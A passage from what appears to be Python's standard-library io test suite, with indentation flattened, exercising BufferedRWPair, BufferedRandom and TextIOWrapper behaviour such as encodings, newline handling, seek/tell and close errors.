pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
